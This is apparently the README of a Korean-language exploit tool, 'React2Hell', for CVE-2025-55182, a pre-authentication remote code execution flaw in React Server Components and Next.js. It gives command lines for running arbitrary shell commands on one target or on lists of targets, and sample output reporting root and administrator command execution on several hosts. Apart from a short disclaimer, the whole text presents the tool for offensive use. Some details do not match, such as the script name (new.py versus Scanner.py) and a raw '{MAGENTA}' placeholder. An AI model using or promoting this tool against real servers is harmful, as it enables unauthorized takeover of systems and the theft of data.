
CVE-2025-55182-advanced-scanner
@#React2Hell — CVE-2025-55182 취약점 공격 도구
🔥 Next.js / React Server 원격 코드 실행 (RCE) 취약점 공격 도구
█████▄ ▄▄▄▄▄ ▄▄▄ ▄▄▄▄ ▄▄▄▄▄▄ ████▄ ▄▄▄▄▄ ██ ██ ▄▄▄▄▄ ▄▄ ▄▄
██▄▄██▄ ██▄▄ ██▀██ ██▀▀▀ ██ ▄██▀ ██▄▄ ██████ ██▄▄ ██ ██
██ ██ ██▄▄▄ ██▀██ ▀████ ██ ███▄▄ ▄▄▄███ ██ ██ ██▄▄▄ ██▄▄▄ ██▄▄▄
{MAGENTA} Next.js/React Server RCE Exploit — CVE-2025-55182
Author: Ankit Pandey GitHub: https://github.com/ankitspandey07
🚀 React2Shell — Security Testing Utility 🚀
════════════════════════════════════════════════════════════════════════
usage: new.py [-h] [-u URL] [-l LIST] -c COMMAND [--proxy PROXY] [--proxy-https PROXY_HTTPS]
React2Hell은 Next.js 및 React Server Actions에 영향을 미치는 심각한 원격 코드 실행 취약점인 CVE-2025-55182를 테스트하고 악용하기 위해 설계된 강력한 익스플로잇 도구입니다.
사전 인증 원격 코드 실행 취약점은 React Server Components 버전 19.0.0, 19.1.0, 19.1.1 및 19.2.0에서 다음 패키지를 포함하여 존재합니다: react-server-dom-parcel, react-server-dom-turbopack 및 react-server-dom-webpack. 취약한 코드는 서버 함수 엔드포인트로 전송되는 HTTP 요청의 페이로드를 안전하지 않게 역직렬화합니다.
python Scanner.py -u https://target.com -c "whoami"
python Scanner.py -l urls.txt -c "whoami"
python Scanner.py -u https://target.com -c "whoami" --proxy 127.0.0.1:8080
python Scanner.py -u https://target.com -c "whoami" --proxy-https 127.0.0.1:8080
http://site1.com
https://site2.com
http://192.168.1.10:3000
PS D:\Ankitspandey07\React2Hell> python.exe .\Scanner.py -l .\list.txt -c whoami
█████▄ ▄▄▄▄▄ ▄▄▄ ▄▄▄▄ ▄▄▄▄▄▄ ████▄ ▄▄▄▄▄ ██ ██ ▄▄▄▄▄ ▄▄ ▄▄
██▄▄██▄ ██▄▄ ██▀██ ██▀▀▀ ██ ▄██▀ ██▄▄ ██████ ██▄▄ ██ ██
██ ██ ██▄▄▄ ██▀██ ▀████ ██ ███▄▄ ▄▄▄███ ██ ██ ██▄▄▄ ██▄▄▄ ██▄▄▄
{MAGENTA} Next.js/React Server RCE Exploit — CVE-2025-55182
Author: Ankit Pandey GitHub: https://github.com/ankitspandey07
🚀 React2Shell — Security Testing Utility 🚀
════════════════════════════════════════════════════════════════════════
[+] Loaded 3 targets
════════════════════════════════════════════════════════════════════════
[→] Target: http://evil.com:3113/
[→] Exec: whoami
[✓] VULNERABLE — RCE Successful!
------------------------------------------------------------
root
------------------------------------------------------------
────────────────────────────────────────────────────────────────────────
[→] Target: http://example.lab:2000/
[→] Exec: whoami
[✗] Not vulnerable — Status: 200
────────────────────────────────────────────────────────────────────────
[→] Target: https://tale.lab:3000/
[→] Exec: whoami
[✓] VULNERABLE — RCE Successful!
------------------------------------------------------------
win-1fl835ovldc\\administrator
------------------------------------------------------------
────────────────────────────────────────────────────────────────────────
[✓] Scan complete — Vulnerable: 2
PS D:\Ankitspandey07\React2Hell>
이 도구는 교육 및 보안 연구 목적으로만 만들어졌습니다. 명시적 승인 없이 시스템에 사용하지 마십시오. 귀하는 자신의 행동에 대한 책임이 있습니다.
이 익스플로잇이 도움이 되었다면 GitHub에 ⭐를 남겨주세요 ❤️
Ankit Pandey; GitHub: https://github.com/Ankitspandey07
자랑스럽고 열정적인 펜테스터로서 매 순간 배우며 성장하는 누군가가 🔥로 만들었습니다.